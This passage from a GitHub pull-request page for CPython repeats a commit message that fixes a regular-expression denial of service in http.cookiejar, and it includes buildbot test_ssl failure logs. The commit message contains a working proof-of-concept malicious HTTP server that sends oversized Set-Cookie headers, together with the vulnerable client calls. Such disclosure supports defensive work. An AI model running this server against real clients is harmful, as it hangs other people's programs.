caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  GH- Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  GH- Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  GH- Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  GH- Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

* Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

* Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
(cherry picked from commit 1b779bf)

Co-authored-by: bcaller <bcaller@users.noreply.github.com>
vstinner added a commit that referenced this pull request Nov 24, 2019
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  # Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  # Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  # Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

* Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

* Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.

(cherry picked from commit 1b779bf)
@bedevere-bot

This comment has been minimized.

Copy link

bedevere-bot commented Nov 24, 2019

⚠️⚠️⚠️ Buildbot failure ⚠️⚠️⚠️

Hi! The buildbot AMD64 FreeBSD Shared 2.7 has failed when building commit e649903.

What do you need to do:

  1. Don't panic.
  2. Check the buildbot page in the devguide if you don't know what the buildbots are or how they work.
  3. Go to the page of the buildbot that failed (https://buildbot.python.org/all/#builders/366/builds/8) and take a look at the build logs.
  4. Check if the failure is related to this commit (e649903) or if it is a false positive.
  5. If the failure is related to this commit, please, reflect that on the issue and make a new Pull Request with a fix.

You can take a look at the buildbot page here:

https://buildbot.python.org/all/#builders/366/builds/8

Failed tests:

  • test_ssl

Failed subtests:

  • test_load_cert_chain - test.test_ssl.ContextTests

Summary of the results of the build (if available):

== Tests result: FAILURE then FAILURE ==

368 tests OK.

10 slowest tests:

  • test_lib2to3: 198.9s
  • test_io: 195.0s
  • test_tokenize: 144.3s
  • test_regrtest: 139.3s
  • test_decimal: 129.4s
  • test_itertools: 110.4s
  • test_multiprocessing: 77.4s
  • test_subprocess: 76.2s
  • test_file2k: 45.5s
  • test_weakref: 43.2s

1 test failed:
test_ssl

35 tests skipped:
test_aepack test_al test_applesingle test_bsddb test_bsddb3
test_cd test_cl test_dl test_epoll test_gdb test_gdbm test_gl
test_idle test_imageop test_imgfile test_ioctl test_linuxaudiodev
test_macos test_macostools test_msilib test_ossaudiodev
test_pep277 test_scriptpackages test_spwd test_startfile
test_sunaudiodev test_tcl test_tk test_ttk_guionly
test_ttk_textonly test_turtle test_unicode_file test_winreg
test_winsound test_zipfile64
Ask someone to teach regrtest.py about which tests are
xpected to get skipped on freebsd13.

1 re-run test:
test_ssl

Total duration: 11 min 47 sec

Click to see traceback logs
Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "/usr/local/lib/python2.7/test/test_support.py", line 2, in <module>
    import test.support
  File "/usr/local/lib/python2.7/test/support/__init__.py", line 6, in <module>
    import contextlib
  File "/usr/local/lib/python2.7/contextlib.py", line 4, in <module>
    from functools import wraps
  File "/usr/local/lib/python2.7/functools.py", line 10, in <module>
    from _functools import partial, reduce
ImportError: /usr/local/lib/python2.7/lib-dynload/_functools.so: Undefined symbol "Py_InitModule4_64"


Traceback (most recent call last):
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 189, in f
    return func(*args, **kwargs)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2402, in test_protocol_sslv23
    try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2134, in try_protocol_combo
    chatty=False, connectionchatty=False)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2062, in server_params_test
    s.connect((HOST, server.port))
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 864, in connect
    self._real_connect(addr, False)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 855, in _real_connect
    self.do_handshake()
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 828, in do_handshake
    self._sslobj.do_handshake()
SSLError: [SSL: TLSV1_ALERT_PROTOCOL_VERSION] tlsv1 alert protocol version (_ssl.c:727)


Traceback (most recent call last):
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/threading.py", line 801, in __bootstrap_inner
    self.run()
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 1810, in run
    msg = self.read()
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 1787, in read
    return self.sslconn.read()
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 641, in read
    v = self._sslobj.read(len)
rror: [Errno 54] Connection reset by peer


Traceback (most recent call last):
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 1730, in wrap_conn
    self.sock, server_side=True)
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 369, in wrap_socket
    _context=self)
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 599, in __init__
    self.do_handshake()
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 828, in do_handshake
    self._sslobj.do_handshake()
 SSLError: [SSL: TLSV1_ALERT_UNKNOWN_CA] tlsv1 alert unknown ca (_ssl.c:727)
 server:  new connection from ('127.0.0.1', 35632)
 server: connection cipher is now ('ECDHE-RSA-AES256-SHA', 'TLSv1.0', 256)
 server: selected protocol is now None
k


Traceback (most recent call last):
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 920, in test_load_cert_chain
    ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
SSLError: [SSL] PEM lib (_ssl.c:2834)


Traceback (most recent call last):
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 189, in f
    return func(*args, **kwargs)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2477, in test_protocol_tlsv1_1
    try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2134, in try_protocol_combo
    chatty=False, connectionchatty=False)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2062, in server_params_test
    s.connect((HOST, server.port))
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 864, in connect
    self._real_connect(addr, False)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 855, in _real_connect
    self.do_handshake()
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 828, in do_handshake
    self._sslobj.do_handshake()
SSLError: [SSL: TLSV1_ALERT_PROTOCOL_VERSION] tlsv1 alert protocol version (_ssl.c:727)


Traceback (most recent call last):
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 1730, in wrap_conn
    self.sock, server_side=True)
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 369, in wrap_socket
    _context=self)
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 599, in __init__
    self.do_handshake()
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 828, in do_handshake
    self._sslobj.do_handshake()
 SSLError: [SSL: NO_SHARED_CIPHER] no shared cipher (_ssl.c:727)
k
@bedevere-bot

This comment has been minimized.

Copy link

bedevere-bot commented Nov 25, 2019

⚠️⚠️⚠️ Buildbot failure ⚠️⚠️⚠️

Hi! The buildbot AMD64 FreeBSD Shared 2.7 has failed when building commit e649903.

What do you need to do:

  1. Don't panic.
  2. Check the buildbot page in the devguide if you don't know what the buildbots are or how they work.
  3. Go to the page of the buildbot that failed (https://buildbot.python.org/all/#builders/366/builds/9) and take a look at the build logs.
  4. Check if the failure is related to this commit (e649903) or if it is a false positive.
  5. If the failure is related to this commit, please, reflect that on the issue and make a new Pull Request with a fix.

You can take a look at the buildbot page here:

https://buildbot.python.org/all/#builders/366/builds/9

Failed tests:

  • test_ssl

Failed subtests:

  • test_load_cert_chain - test.test_ssl.ContextTests

Summary of the results of the build (if available):

== Tests result: FAILURE then FAILURE ==

368 tests OK.

10 slowest tests:

  • test_lib2to3: 258.7s
  • test_io: 234.9s
  • test_tokenize: 181.0s
  • test_regrtest: 167.1s
  • test_decimal: 142.4s
  • test_itertools: 134.2s
  • test_subprocess: 115.7s
  • test_weakref: 63.0s
  • test_asyncore: 52.0s
  • test_multibytecodec: 46.3s

1 test failed:
test_ssl

35 tests skipped:
test_aepack test_al test_applesingle test_bsddb test_bsddb3
test_cd test_cl test_dl test_epoll test_gdb test_gdbm test_gl
test_idle test_imageop test_imgfile test_ioctl test_linuxaudiodev
test_macos test_macostools test_msilib test_ossaudiodev
test_pep277 test_scriptpackages test_spwd test_startfile
test_sunaudiodev test_tcl test_tk test_ttk_guionly
test_ttk_textonly test_turtle test_unicode_file test_winreg
test_winsound test_zipfile64
Ask someone to teach regrtest.py about which tests are
xpected to get skipped on freebsd13.

1 re-run test:
test_ssl

Total duration: 14 min 13 sec

Click to see traceback logs
Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "/usr/local/lib/python2.7/test/test_support.py", line 2, in <module>
    import test.support
  File "/usr/local/lib/python2.7/test/support/__init__.py", line 6, in <module>
    import contextlib
  File "/usr/local/lib/python2.7/contextlib.py", line 4, in <module>
    from functools import wraps
  File "/usr/local/lib/python2.7/functools.py", line 10, in <module>
    from _functools import partial, reduce
ImportError: /usr/local/lib/python2.7/lib-dynload/_functools.so: Undefined symbol "Py_InitModule4_64"


Traceback (most recent call last):
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 189, in f
    return func(*args, **kwargs)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2402, in test_protocol_sslv23
    try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2134, in try_protocol_combo
    chatty=False, connectionchatty=False)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2062, in server_params_test
    s.connect((HOST, server.port))
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 864, in connect
    self._real_connect(addr, False)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 855, in _real_connect
    self.do_handshake()
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 828, in do_handshake
    self._sslobj.do_handshake()
SSLError: [SSL: TLSV1_ALERT_PROTOCOL_VERSION] tlsv1 alert protocol version (_ssl.c:727)


Traceback (most recent call last):
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/threading.py", line 801, in __bootstrap_inner
    self.run()
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 1810, in run
    msg = self.read()
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 1787, in read
    return self.sslconn.read()
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 641, in read
    v = self._sslobj.read(len)
rror: [Errno 54] Connection reset by peer


Traceback (most recent call last):
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 1730, in wrap_conn
    self.sock, server_side=True)
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 369, in wrap_socket
    _context=self)
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 599, in __init__
    self.do_handshake()
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 828, in do_handshake
    self._sslobj.do_handshake()
 SSLError: [SSL: TLSV1_ALERT_UNKNOWN_CA] tlsv1 alert unknown ca (_ssl.c:727)
 server:  new connection from ('127.0.0.1', 58881)
 server: connection cipher is now ('ECDHE-RSA-AES256-SHA', 'TLSv1.0', 256)
 server: selected protocol is now None
k


Traceback (most recent call last):
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 920, in test_load_cert_chain
    ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
SSLError: [SSL] PEM lib (_ssl.c:2834)


Traceback (most recent call last):
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 189, in f
    return func(*args, **kwargs)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2477, in test_protocol_tlsv1_1
    try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2134, in try_protocol_combo
    chatty=False, connectionchatty=False)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2062, in server_params_test
    s.connect((HOST, server.port))
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 864, in connect
    self._real_connect(addr, False)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 855, in _real_connect
    self.do_handshake()
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 828, in do_handshake
    self._sslobj.do_handshake()
SSLError: [SSL: TLSV1_ALERT_PROTOCOL_VERSION] tlsv1 alert protocol version (_ssl.c:727)


Traceback (most recent call last):
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 1730, in wrap_conn
    self.sock, server_side=True)
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 369, in wrap_socket
    _context=self)
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 599, in __init__
    self.do_handshake()
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 828, in do_handshake
    self._sslobj.do_handshake()
 SSLError: [SSL: NO_SHARED_CIPHER] no shared cipher (_ssl.c:727)
k
jacobneiltaylor added a commit to jacobneiltaylor/cpython that referenced this pull request Dec 5, 2019
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  # Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  # Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  # Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

* Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

* Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
shihai1991 added a commit to shihai1991/cpython that referenced this pull request Jan 31, 2020
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  # Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  # Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  # Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

* Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

* Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
7 participants
You can’t perform that action at this time.